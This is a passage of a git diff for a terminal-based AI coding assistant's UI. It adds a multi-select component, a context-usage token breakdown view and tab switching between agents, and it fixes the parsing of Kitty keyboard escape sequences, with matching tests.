=> void; + onChange?: (selectedValues: T[]) => void; + onHighlight?: (value: T) => void; + isFocused?: boolean; + showNumbers?: boolean; + showScrollArrows?: boolean; + maxItemsToShow?: number; +} + +const EMPTY_SELECTED_KEYS: string[] = []; + +function getSelectedValues( 
+ items: Array>, + selectedKeys: Set, +): T[] { + return items + .filter((item) => selectedKeys.has(item.key)) + .map((item) => item.value); +} + +export function MultiSelect({ + items, + initialIndex = 0, + initialSelectedKeys = EMPTY_SELECTED_KEYS, + onConfirm, + onChange, + onHighlight, + isFocused = true, + showNumbers = true, + showScrollArrows = false, + maxItemsToShow = 10, +}: MultiSelectProps): React.JSX.Element { + const [selectedKeys, setSelectedKeys] = useState>( + () => new Set(initialSelectedKeys), + ); + const [scrollOffset, setScrollOffset] = useState(0); + + useEffect(() => { + setSelectedKeys((prev) => { + const next = new Set(initialSelectedKeys); + if ( + prev.size === next.size && + Array.from(next).every((key) => prev.has(key)) + ) { + return prev; + } + return next; + }); + }, [initialSelectedKeys]); + + const { activeIndex } = useSelectionList({ + items, + initialIndex, + isFocused, + // Disable numeric quick-select in useSelectionList — in a multi-select + // context, onSelect triggers onConfirm (submit), so numeric keys would + // accidentally submit the dialog instead of toggling checkboxes. + // Numbers are still rendered visually via the showNumbers prop below. 
+ showNumbers: false, + onHighlight, + onSelect: () => { + onConfirm(getSelectedValues(items, selectedKeys)); + }, + }); + + const toggleSelectionAtIndex = useCallback( + (index: number) => { + const item = items[index]; + if (!item || item.disabled) { + return; + } + + setSelectedKeys((prev) => { + const next = new Set(prev); + if (next.has(item.key)) { + next.delete(item.key); + } else { + next.add(item.key); + } + return next; + }); + }, + [items], + ); + + useEffect(() => { + onChange?.(getSelectedValues(items, selectedKeys)); + }, [items, selectedKeys, onChange]); + + useKeypress( + (key) => { + if (key.name === 'space' || key.sequence === ' ') { + toggleSelectionAtIndex(activeIndex); + } + }, + { isActive: isFocused }, + ); + + useEffect(() => { + const newScrollOffset = Math.max( + 0, + Math.min(activeIndex - maxItemsToShow + 1, items.length - maxItemsToShow), + ); + if (activeIndex < scrollOffset) { + setScrollOffset(activeIndex); + } else if (activeIndex >= scrollOffset + maxItemsToShow) { + setScrollOffset(newScrollOffset); + } + }, [activeIndex, items.length, scrollOffset, maxItemsToShow]); + + const visibleItems = useMemo( + () => items.slice(scrollOffset, scrollOffset + maxItemsToShow), + [items, scrollOffset, maxItemsToShow], + ); + const numberColumnWidth = String(items.length).length; + const hasMoreAbove = scrollOffset > 0; + const hasMoreBelow = scrollOffset + maxItemsToShow < items.length; + const moreAboveCount = scrollOffset; + const moreBelowCount = Math.max( + 0, + items.length - (scrollOffset + maxItemsToShow), + ); + + return ( + + {showScrollArrows && hasMoreAbove && ( + ↑ {moreAboveCount} more above + )} + + {visibleItems.map((item, index) => { + const itemIndex = scrollOffset + index; + const isActive = activeIndex === itemIndex; + const isChecked = selectedKeys.has(item.key); + + const itemNumberText = `${String(itemIndex + 1).padStart( + numberColumnWidth, + )}.`; + const checkboxText = item.disabled ? '[x]' : isChecked ? 
'[✓]' : '[ ]'; + + let textColor = theme.text.primary; + if (item.disabled) { + textColor = theme.text.secondary; + } else if (isActive) { + textColor = theme.status.success; + } else if (isChecked) { + textColor = theme.text.accent; + } + + return ( + + + {checkboxText} + + {showNumbers && ( + + {itemNumberText} + + )} + + {item.label} + + + ); + })} + + {showScrollArrows && hasMoreBelow && ( + ↓ {moreBelowCount} more below + )} + + ); +} diff --git a/packages/cli/src/ui/components/shared/TextInput.tsx b/packages/cli/src/ui/components/shared/TextInput.tsx index 01ebc2fa0..eed7d2a78 100644 --- a/packages/cli/src/ui/components/shared/TextInput.tsx +++ b/packages/cli/src/ui/components/shared/TextInput.tsx @@ -21,6 +21,12 @@ export interface TextInputProps { value: string; onChange: (text: string) => void; onSubmit?: () => void; + /** Called when Tab is pressed; if provided, prevents the default tab-insertion behaviour. */ + onTab?: () => void; + /** Called when ↑ is pressed; if provided, prevents cursor-up in the buffer. */ + onUp?: () => void; + /** Called when ↓ is pressed; if provided, prevents cursor-down in the buffer. 
*/ + onDown?: () => void; placeholder?: string; height?: number; // lines in viewport; >1 enables multiline isActive?: boolean; // when false, ignore keypresses @@ -33,6 +39,9 @@ export function TextInput({ value, onChange, onSubmit, + onTab, + onUp, + onDown, placeholder, height = 1, isActive = true, @@ -68,6 +77,22 @@ export function TextInput({ (key: Key) => { if (!buffer || !isActive) return; + // Tab completion: delegate to caller instead of inserting a tab character + if (key.name === 'tab') { + onTab?.(); + return; + } + + // Arrow-key completion navigation: delegate to caller + if (key.name === 'up' && onUp) { + onUp(); + return; + } + if (key.name === 'down' && onDown) { + onDown(); + return; + } + // Submit on Enter if (keyMatchers[Command.SUBMIT](key) || key.name === 'return') { if (allowMultiline) { diff --git a/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap b/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap index 822b88b0c..5a4505062 100644 --- a/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap +++ b/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap @@ -4,7 +4,7 @@ exports[`DescriptiveRadioButtonSelect > should render correctly with custom prop "▲ 1. Foo Title This is Foo. -● 2. Bar Title +› 2. Bar Title This is Bar. 3. Baz Title This is Baz. @@ -12,7 +12,7 @@ exports[`DescriptiveRadioButtonSelect > should render correctly with custom prop `; exports[`DescriptiveRadioButtonSelect > should render correctly with default props 1`] = ` -"● Foo Title +"› Foo Title This is Foo. Bar Title This is Bar. 
diff --git a/packages/cli/src/ui/components/shared/text-buffer.ts b/packages/cli/src/ui/components/shared/text-buffer.ts index 369c7fff5..c68bd1a4b 100644 --- a/packages/cli/src/ui/components/shared/text-buffer.ts +++ b/packages/cli/src/ui/components/shared/text-buffer.ts @@ -1907,8 +1907,8 @@ export function useTextBuffer({ else if (key.ctrl && key.name === 'b') move('left'); else if (key.name === 'right' && !key.meta && !key.ctrl) move('right'); else if (key.ctrl && key.name === 'f') move('right'); - else if (key.name === 'up') move('up'); - else if (key.name === 'down') move('down'); + else if (key.name === 'up' && !key.shift) move('up'); + else if (key.name === 'down' && !key.shift) move('down'); else if ((key.ctrl || key.meta) && key.name === 'left') move('wordLeft'); else if (key.meta && key.name === 'b') move('wordLeft'); else if ((key.ctrl || key.meta) && key.name === 'right') diff --git a/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx b/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx index 0cc899b87..58f0cf7d2 100644 --- a/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx +++ b/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx @@ -94,7 +94,7 @@ export function CreationSummary({ } // Check length warnings - if (state.generatedDescription.length > 300) { + if (state.generatedDescription.length > 1000) { allWarnings.push( t('Description is over {{length}} characters', { length: state.generatedDescription.length.toString(), diff --git a/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx b/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx index 8f9fe2a6a..8da7a3a24 100644 --- a/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx +++ b/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx @@ -8,7 +8,7 @@ import React, { useMemo } from 'react'; import { Box, Text } from 'ink'; import type { 
TaskResultDisplay, - SubagentStatsSummary, + AgentStatsSummary, Config, } from '@qwen-code/qwen-code-core'; import { theme } from '../../../semantic-colors.js'; @@ -467,7 +467,7 @@ const ExecutionSummaryDetails: React.FC<{ * Tool usage statistics component */ const ToolUsageStats: React.FC<{ - executionSummary?: SubagentStatsSummary; + executionSummary?: AgentStatsSummary; }> = ({ executionSummary }) => { if (!executionSummary) { return ( diff --git a/packages/cli/src/ui/components/views/ContextUsage.tsx b/packages/cli/src/ui/components/views/ContextUsage.tsx new file mode 100644 index 000000000..f6bed1d26 --- /dev/null +++ b/packages/cli/src/ui/components/views/ContextUsage.tsx @@ -0,0 +1,424 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { theme } from '../../semantic-colors.js'; +import type { + ContextCategoryBreakdown, + ContextToolDetail, + ContextMemoryDetail, + ContextSkillDetail, +} from '../../types.js'; +import { t } from '../../../i18n/index.js'; + +// Progress bar characters +const FILLED = '\u2588'; // █ - filled block +const BUFFER = '\u2592'; // ▒ - medium shade (autocompact buffer) +const EMPTY = '\u2591'; // ░ - light shade (free space) + +const CONTENT_WIDTH = 56; + +interface ContextUsageProps { + modelName: string; + totalTokens: number; + contextWindowSize: number; + breakdown: ContextCategoryBreakdown; + builtinTools: ContextToolDetail[]; + mcpTools: ContextToolDetail[]; + memoryFiles: ContextMemoryDetail[]; + skills: ContextSkillDetail[]; + /** True when totalTokens is estimated (no API call yet) */ + isEstimated?: boolean; + /** When true, show per-item detail breakdowns. Default: false (compact). */ + showDetails?: boolean; +} + +/** + * Truncate a string to maxLen, appending '…' if truncated. 
+ */ +function truncateName(name: string, maxLen: number): string { + if (name.length <= maxLen) return name; + return name.slice(0, maxLen - 1) + '\u2026'; +} + +/** + * Format token count for display (e.g. 1234 -> "1.2k", 123456 -> "123.5k") + */ +function formatTokens(tokens: number): string { + if (tokens >= 1000) { + return `${(tokens / 1000).toFixed(1)}k`; + } + return `${tokens}`; +} + +/** + * Render a three-segment progress bar: used | autocompact buffer | free space. + */ +const ProgressBar: React.FC<{ + usedPercentage: number; + bufferPercentage: number; + width: number; +}> = ({ usedPercentage, bufferPercentage, width }) => { + const usedCount = Math.round((Math.min(usedPercentage, 100) / 100) * width); + const bufferCount = Math.round( + (Math.min(bufferPercentage, 100 - usedPercentage) / 100) * width, + ); + const freeCount = Math.max(0, width - usedCount - bufferCount); + + const usedStr = FILLED.repeat(Math.max(0, usedCount)); + const freeStr = EMPTY.repeat(Math.max(0, freeCount)); + const bufferStr = BUFFER.repeat(Math.max(0, bufferCount)); + + // Used color: accent by default, warning/error at high usage. + let usedColor = theme.text.accent; + if (usedPercentage > 80) { + usedColor = theme.status.error; + } else if (usedPercentage > 60) { + usedColor = theme.status.warning; + } + + return ( + + {usedStr} + {freeStr} + {bufferStr} + + ); +}; + +/** + * A row showing a category with its token count and percentage. + */ +const CategoryRow: React.FC<{ + symbol: string; + label: string; + tokens: number; + contextWindowSize: number; + symbolColor?: string; +}> = ({ symbol, label, tokens, contextWindowSize, symbolColor }) => { + const percentage = ((tokens / contextWindowSize) * 100).toFixed(1); + const tokenStr = `${formatTokens(tokens)} ${t('tokens')} (${percentage}%)`; + + return ( + + + {symbol} + + + {label} + + + {tokenStr} + + + ); +}; + +/** + * A detail row for individual items (MCP tools, memory files, skills). 
+ */ +const DETAIL_NAME_MAX_LEN = 30; + +const DetailRow: React.FC<{ + name: string; + tokens: number; +}> = ({ name, tokens }) => { + const tokenStr = + tokens > 0 ? `${formatTokens(tokens)} ${t('tokens')}` : `0 ${t('tokens')}`; + return ( + + {'\u2514'} + + + {truncateName(name, DETAIL_NAME_MAX_LEN)} + + + + {tokenStr} + + + ); +}; + +export const ContextUsage: React.FC = ({ + modelName, + totalTokens, + contextWindowSize, + breakdown, + builtinTools, + mcpTools, + memoryFiles, + skills, + isEstimated, + showDetails = false, +}) => { + const percentage = + contextWindowSize > 0 ? (totalTokens / contextWindowSize) * 100 : 0; + + // Sort detail items by token count (descending) for better readability + const sortedBuiltinTools = [...builtinTools].sort( + (a, b) => b.tokens - a.tokens, + ); + const sortedMcpTools = [...mcpTools].sort((a, b) => b.tokens - a.tokens); + const sortedMemoryFiles = [...memoryFiles].sort( + (a, b) => b.tokens - a.tokens, + ); + // Sort skills: loaded first, then by total token cost descending + const sortedSkills = [...skills].sort((a, b) => { + if (a.loaded !== b.loaded) return a.loaded ? -1 : 1; + const aTotal = a.tokens + (a.bodyTokens ?? 0); + const bTotal = b.tokens + (b.bodyTokens ?? 0); + return bTotal - aTotal; + }); + + return ( + + {/* Title */} + + {t('Context Usage')} + + + + {isEstimated ? ( + <> + {/* No API data yet — show hint instead of progress bar */} + + + {t('No API response yet. Send a message to see actual usage.')} + + + + {/* Estimated overhead categories */} + + {t('Estimated pre-conversation overhead')} + + + {t('Model')}: {modelName} + {' '} + {t('Context window')}: {formatTokens(contextWindowSize)}{' '} + {t('tokens')} + + + + ) : ( + <> + {/* Model name + context window info */} + + + {t('Model')}: {modelName} + + + + {t('Context window')}: {formatTokens(contextWindowSize)}{' '} + {t('tokens')} + + + + {/* Progress bar — three segments: used | free | buffer */} + + 0 + ? 
(breakdown.autocompactBuffer / contextWindowSize) * 100 + : 0 + } + width={CONTENT_WIDTH} + /> + + + {/* Legend — same layout as CategoryRow for alignment */} + + + + + + {/* Breakdown header */} + + {t('Usage by category')} + + + )} + + + + {breakdown.mcpTools > 0 && ( + + )} + + + {/* Only show Messages when we have real API data */} + {!isEstimated && ( + + )} + + {showDetails ? ( + <> + {/* Built-in tools detail */} + {sortedBuiltinTools.length > 0 && ( + + + {t('Built-in tools')} + + {sortedBuiltinTools.map((tool) => ( + + ))} + + )} + + {/* MCP Tools detail */} + {sortedMcpTools.length > 0 && ( + + + {t('MCP tools')} + + {sortedMcpTools.map((tool) => ( + + ))} + + )} + + {/* Memory files detail */} + {sortedMemoryFiles.length > 0 && ( + + + {t('Memory files')} + + {sortedMemoryFiles.map((file) => ( + + ))} + + )} + + {/* Skills detail */} + {sortedSkills.length > 0 && ( + + + {t('Skills')} + + {sortedSkills.map((skill) => ( + + + {'\u2514'} + + + {truncateName(skill.name, DETAIL_NAME_MAX_LEN)} + + {skill.loaded && ( + {t('active')} + )} + + + + {formatTokens(skill.tokens)} {t('tokens')} + + + + {skill.loaded && + skill.bodyTokens != null && + skill.bodyTokens > 0 && ( + + {' \u2514'} + + + {t('body loaded')} + + + + + +{formatTokens(skill.bodyTokens)} {t('tokens')} + + + + )} + + ))} + + )} + + ) : ( + + + {t('Run /context detail for per-item breakdown.')} + + + )} + + ); +}; diff --git a/packages/cli/src/ui/contexts/AgentViewContext.tsx b/packages/cli/src/ui/contexts/AgentViewContext.tsx new file mode 100644 index 000000000..b2c35e6d3 --- /dev/null +++ b/packages/cli/src/ui/contexts/AgentViewContext.tsx @@ -0,0 +1,308 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentViewContext — React context for in-process agent view switching. + * + * Tracks which view is active (main or an agent tab) and the set of registered + * AgentInteractive instances. 
Consumed by AgentTabBar, AgentChatView, and + * DefaultAppLayout to implement tab-based agent navigation. + * + * Kept separate from UIStateContext to avoid bloating the main state with + * in-process-only concerns and to make the feature self-contained. + */ + +import { + createContext, + useContext, + useCallback, + useMemo, + useState, +} from 'react'; +import { + type AgentInteractive, + type ApprovalMode, + type Config, +} from '@qwen-code/qwen-code-core'; +import { useArenaInProcess } from '../hooks/useArenaInProcess.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface RegisteredAgent { + interactiveAgent: AgentInteractive; + /** Model identifier shown in tabs and paths (e.g. "glm-5"). */ + modelId: string; + /** Human-friendly model name (e.g. "GLM 5"). */ + modelName?: string; + color: string; +} + +export interface AgentViewState { + /** 'main' or an agentId */ + activeView: string; + /** Registered in-process agents keyed by agentId */ + agents: ReadonlyMap; + /** Whether any agent tab's embedded shell currently has input focus. */ + agentShellFocused: boolean; + /** Current text in the active agent tab's input buffer (empty when on main). */ + agentInputBufferText: string; + /** Whether the tab bar has keyboard focus (vs the agent input). */ + agentTabBarFocused: boolean; + /** Per-agent approval modes (keyed by agentId). 
*/ + agentApprovalModes: ReadonlyMap; +} + +export interface AgentViewActions { + switchToMain(): void; + switchToAgent(agentId: string): void; + switchToNext(): void; + switchToPrevious(): void; + registerAgent( + agentId: string, + interactiveAgent: AgentInteractive, + modelId: string, + color: string, + modelName?: string, + ): void; + unregisterAgent(agentId: string): void; + unregisterAll(): void; + setAgentShellFocused(focused: boolean): void; + setAgentInputBufferText(text: string): void; + setAgentTabBarFocused(focused: boolean): void; + setAgentApprovalMode(agentId: string, mode: ApprovalMode): void; +} + +// ─── Context ──────────────────────────────────────────────── + +const AgentViewStateContext = createContext(null); +const AgentViewActionsContext = createContext(null); + +// ─── Defaults (used when no provider is mounted) ──────────── + +const DEFAULT_STATE: AgentViewState = { + activeView: 'main', + agents: new Map(), + agentShellFocused: false, + agentInputBufferText: '', + agentTabBarFocused: false, + agentApprovalModes: new Map(), +}; + +const noop = () => {}; + +const DEFAULT_ACTIONS: AgentViewActions = { + switchToMain: noop, + switchToAgent: noop, + switchToNext: noop, + switchToPrevious: noop, + registerAgent: noop, + unregisterAgent: noop, + unregisterAll: noop, + setAgentShellFocused: noop, + setAgentInputBufferText: noop, + setAgentTabBarFocused: noop, + setAgentApprovalMode: noop, +}; + +// ─── Hook: useAgentViewState ──────────────────────────────── + +export function useAgentViewState(): AgentViewState { + return useContext(AgentViewStateContext) ?? DEFAULT_STATE; +} + +// ─── Hook: useAgentViewActions ────────────────────────────── + +export function useAgentViewActions(): AgentViewActions { + return useContext(AgentViewActionsContext) ?? 
DEFAULT_ACTIONS; +} + +// ─── Provider ─────────────────────────────────────────────── + +interface AgentViewProviderProps { + config?: Config; + children: React.ReactNode; +} + +export function AgentViewProvider({ + config, + children, +}: AgentViewProviderProps) { + const [activeView, setActiveView] = useState('main'); + const [agents, setAgents] = useState>( + () => new Map(), + ); + const [agentShellFocused, setAgentShellFocused] = useState(false); + const [agentInputBufferText, setAgentInputBufferText] = useState(''); + const [agentTabBarFocused, setAgentTabBarFocused] = useState(false); + const [agentApprovalModes, setAgentApprovalModes] = useState< + Map + >(() => new Map()); + + // ── Navigation ── + + const switchToMain = useCallback(() => { + setActiveView('main'); + setAgentTabBarFocused(false); + }, []); + + const switchToAgent = useCallback( + (agentId: string) => { + if (agents.has(agentId)) { + setActiveView(agentId); + } + }, + [agents], + ); + + const switchToNext = useCallback(() => { + const ids = ['main', ...agents.keys()]; + const currentIndex = ids.indexOf(activeView); + const nextIndex = (currentIndex + 1) % ids.length; + setActiveView(ids[nextIndex]!); + }, [agents, activeView]); + + const switchToPrevious = useCallback(() => { + const ids = ['main', ...agents.keys()]; + const currentIndex = ids.indexOf(activeView); + const prevIndex = (currentIndex - 1 + ids.length) % ids.length; + setActiveView(ids[prevIndex]!); + }, [agents, activeView]); + + // ── Registration ── + + const registerAgent = useCallback( + ( + agentId: string, + interactiveAgent: AgentInteractive, + modelId: string, + color: string, + modelName?: string, + ) => { + setAgents((prev) => { + const next = new Map(prev); + next.set(agentId, { + interactiveAgent, + modelId, + color, + modelName, + }); + return next; + }); + // Seed approval mode from the agent's own config + const mode = interactiveAgent.getCore().runtimeContext.getApprovalMode(); + setAgentApprovalModes((prev) 
=> { + const next = new Map(prev); + next.set(agentId, mode); + return next; + }); + }, + [], + ); + + const unregisterAgent = useCallback((agentId: string) => { + setAgents((prev) => { + if (!prev.has(agentId)) return prev; + const next = new Map(prev); + next.delete(agentId); + return next; + }); + setAgentApprovalModes((prev) => { + if (!prev.has(agentId)) return prev; + const next = new Map(prev); + next.delete(agentId); + return next; + }); + setActiveView((current) => (current === agentId ? 'main' : current)); + }, []); + + const unregisterAll = useCallback(() => { + setAgents(new Map()); + setAgentApprovalModes(new Map()); + setActiveView('main'); + setAgentTabBarFocused(false); + }, []); + + const setAgentApprovalMode = useCallback( + (agentId: string, mode: ApprovalMode) => { + // Update the agent's runtime config so tool scheduling picks it up + const agent = agents.get(agentId); + if (agent) { + agent.interactiveAgent.getCore().runtimeContext.setApprovalMode(mode); + } + // Update UI state + setAgentApprovalModes((prev) => { + const next = new Map(prev); + next.set(agentId, mode); + return next; + }); + }, + [agents], + ); + + // ── Memoized values ── + + const state: AgentViewState = useMemo( + () => ({ + activeView, + agents, + agentShellFocused, + agentInputBufferText, + agentTabBarFocused, + agentApprovalModes, + }), + [ + activeView, + agents, + agentShellFocused, + agentInputBufferText, + agentTabBarFocused, + agentApprovalModes, + ], + ); + + const actions: AgentViewActions = useMemo( + () => ({ + switchToMain, + switchToAgent, + switchToNext, + switchToPrevious, + registerAgent, + unregisterAgent, + unregisterAll, + setAgentShellFocused, + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + }), + [ + switchToMain, + switchToAgent, + switchToNext, + switchToPrevious, + registerAgent, + unregisterAgent, + unregisterAll, + setAgentShellFocused, + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + ], + 
); + + // ── Arena in-process bridge ── + // Bridge arena manager events to agent registration. The hook is kept + // in its own file for separation of concerns; it's called here so the + // provider is the single owner of agent tab lifecycle. + useArenaInProcess(config ?? null, actions); + + return ( + + + {children} + + + ); +} diff --git a/packages/cli/src/ui/contexts/KeypressContext.test.tsx b/packages/cli/src/ui/contexts/KeypressContext.test.tsx index edf25bead..b662ec7ed 100644 --- a/packages/cli/src/ui/contexts/KeypressContext.test.tsx +++ b/packages/cli/src/ui/contexts/KeypressContext.test.tsx @@ -1367,6 +1367,75 @@ describe('KeypressContext - Kitty Protocol', () => { }), ); }); + + it('drops unsupported Kitty CSI-u keys without blocking later input', () => { + const keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => stdin.sendKittySequence(`\x1b[57358u`)); // CAPS_LOCK + act(() => + stdin.pressKey({ + name: 'a', + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: 'a', + }), + ); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'a', + sequence: 'a', + }), + ); + }); + + it('recovers plain text that arrives in the same chunk after an unsupported CSI-u key', () => { + const keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => + stdin.pressKey({ + name: '', + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: '\x1b[57358ua', + }), + ); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'a', + sequence: 'a', + kittyProtocol: true, + }), + ); + }); + + it('drops unsupported CSI-u variants with event metadata and keeps parsing', () => { + const 
keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => stdin.sendKittySequence(`\x1b[57358;1:1u\x1b[100u`)); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'd', + sequence: 'd', + kittyProtocol: true, + }), + ); + }); }); describe('Kitty keypad private-use keys', () => { diff --git a/packages/cli/src/ui/contexts/KeypressContext.tsx b/packages/cli/src/ui/contexts/KeypressContext.tsx index 791602f6a..97db27563 100644 --- a/packages/cli/src/ui/contexts/KeypressContext.tsx +++ b/packages/cli/src/ui/contexts/KeypressContext.tsx @@ -178,6 +178,25 @@ export function KeypressProvider({ let rawDataBuffer = Buffer.alloc(0); let rawFlushTimeout: NodeJS.Timeout | null = null; + const createPrintableKey = (char: string): Key => { + const printableName = + char === ' ' + ? 'space' + : /^[A-Za-z]$/.test(char) + ? char.toLowerCase() + : char; + + return { + name: printableName, + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: char, + kittyProtocol: true, + }; + }; + // Parse a single complete kitty sequence from the start (prefix) of the // buffer and return both the Key and the number of characters consumed. // This lets us "peel off" one complete event when multiple sequences arrive @@ -415,22 +434,11 @@ export function KeypressProvider({ keyCode <= 0x10ffff && !(keyCode >= 0xe000 && keyCode <= 0xf8ff) ) { - const char = String.fromCodePoint(keyCode); - const printableName = - char === ' ' - ? 'space' - : /^[A-Za-z]$/.test(char) - ? 
char.toLowerCase() - : char; return { key: { - name: printableName, - ctrl: false, + ...createPrintableKey(String.fromCodePoint(keyCode)), meta: alt, shift, - paste: false, - sequence: char, - kittyProtocol: true, }, length: m[0].length, }; @@ -490,6 +498,42 @@ export function KeypressProvider({ return null; }; + const getCompleteCsiSequenceLength = (buffer: string): number | null => { + if (!buffer.startsWith(`${ESC}[`)) { + return null; + } + + for (let i = 2; i < buffer.length; i++) { + const code = buffer.charCodeAt(i); + if (code >= 0x40 && code <= 0x7e) { + return i + 1; + } + if (code < 0x20 || code > 0x3f) { + return 0; + } + } + + return null; + }; + + const parsePlainTextPrefix = ( + buffer: string, + ): { key: Key; length: number } | null => { + if (!buffer || buffer.startsWith(ESC)) { + return null; + } + + const [char] = Array.from(buffer); + if (!char) { + return null; + } + + return { + key: createPrintableKey(char), + length: char.length, + }; + }; + const broadcast = (key: Key) => { for (const handler of subscribers) { handler(key); @@ -653,47 +697,82 @@ export function KeypressProvider({ // start of the buffer. This handles batched inputs cleanly. If the // prefix is incomplete or invalid, skip to the next CSI introducer // (ESC[) so that a following valid sequence can still be parsed. 
- let parsedAny = false; + let bufferedInputHandled = false; while (kittySequenceBuffer) { const parsed = parseKittyPrefix(kittySequenceBuffer); - if (!parsed) { - // Look for the next potential CSI start beyond index 0 - const nextStart = kittySequenceBuffer.indexOf(`${ESC}[`, 1); - if (nextStart > 0) { - if (debugKeystrokeLogging) { + if (parsed) { + if (debugKeystrokeLogging) { + const parsedSequence = kittySequenceBuffer.slice( + 0, + parsed.length, + ); + if (kittySequenceBuffer.length > parsed.length) { debugLogger.debug( - '[DEBUG] Skipping incomplete/invalid CSI prefix:', - kittySequenceBuffer.slice(0, nextStart), + '[DEBUG] Kitty sequence parsed successfully (prefix):', + parsedSequence, + ); + } else { + debugLogger.debug( + '[DEBUG] Kitty sequence parsed successfully:', + parsedSequence, ); } - kittySequenceBuffer = kittySequenceBuffer.slice(nextStart); - continue; } - break; + // Consume the parsed prefix and broadcast it. + kittySequenceBuffer = kittySequenceBuffer.slice(parsed.length); + broadcast(parsed.key); + bufferedInputHandled = true; + continue; } - if (debugKeystrokeLogging) { - const parsedSequence = kittySequenceBuffer.slice( - 0, - parsed.length, + + const completeUnsupportedCsiLength = + getCompleteCsiSequenceLength(kittySequenceBuffer); + if (completeUnsupportedCsiLength) { + if (debugKeystrokeLogging) { + debugLogger.debug( + '[DEBUG] Dropping unsupported complete CSI sequence:', + kittySequenceBuffer.slice(0, completeUnsupportedCsiLength), + ); + } + kittySequenceBuffer = kittySequenceBuffer.slice( + completeUnsupportedCsiLength, ); - if (kittySequenceBuffer.length > parsed.length) { + bufferedInputHandled = true; + continue; + } + + const plainTextPrefix = parsePlainTextPrefix(kittySequenceBuffer); + if (plainTextPrefix) { + if (debugKeystrokeLogging) { debugLogger.debug( - '[DEBUG] Kitty sequence parsed successfully (prefix):', - parsedSequence, - ); - } else { - debugLogger.debug( - '[DEBUG] Kitty sequence parsed successfully:', - 
parsedSequence, + '[DEBUG] Recovered plain text after kitty sequence:', + plainTextPrefix.key.sequence, ); } + kittySequenceBuffer = kittySequenceBuffer.slice( + plainTextPrefix.length, + ); + broadcast(plainTextPrefix.key); + bufferedInputHandled = true; + continue; } - // Consume the parsed prefix and broadcast it. - kittySequenceBuffer = kittySequenceBuffer.slice(parsed.length); - broadcast(parsed.key); - parsedAny = true; + + // Look for the next potential CSI start beyond index 0 + const nextStart = kittySequenceBuffer.indexOf(`${ESC}[`, 1); + if (nextStart > 0) { + if (debugKeystrokeLogging) { + debugLogger.debug( + '[DEBUG] Skipping incomplete/invalid CSI prefix:', + kittySequenceBuffer.slice(0, nextStart), + ); + } + kittySequenceBuffer = kittySequenceBuffer.slice(nextStart); + bufferedInputHandled = true; + continue; + } + break; } - if (parsedAny) return; + if (bufferedInputHandled) return; if (config?.getDebugMode() || debugKeystrokeLogging) { const codes = Array.from(kittySequenceBuffer).map((ch) => diff --git a/packages/cli/src/ui/contexts/UIActionsContext.tsx b/packages/cli/src/ui/contexts/UIActionsContext.tsx index 19464cccc..8604e6744 100644 --- a/packages/cli/src/ui/contexts/UIActionsContext.tsx +++ b/packages/cli/src/ui/contexts/UIActionsContext.tsx @@ -17,6 +17,7 @@ import { import { type SettingScope } from '../../config/settings.js'; import { type CodingPlanRegion } from '../../constants/codingPlan.js'; import type { AuthState } from '../types.js'; +import { type ArenaDialogType } from '../hooks/useArenaCommand.js'; // OpenAICredentials type (previously imported from OpenAIKeyPrompt) export interface OpenAICredentials { apiKey: string; @@ -54,7 +55,11 @@ export interface UIActions { exitEditorDialog: () => void; closeSettingsDialog: () => void; closeModelDialog: () => void; + openArenaDialog: (type: Exclude) => void; + closeArenaDialog: () => void; + handleArenaModelsSelected?: (models: string[]) => void; dismissCodingPlanUpdate: () => void; + 
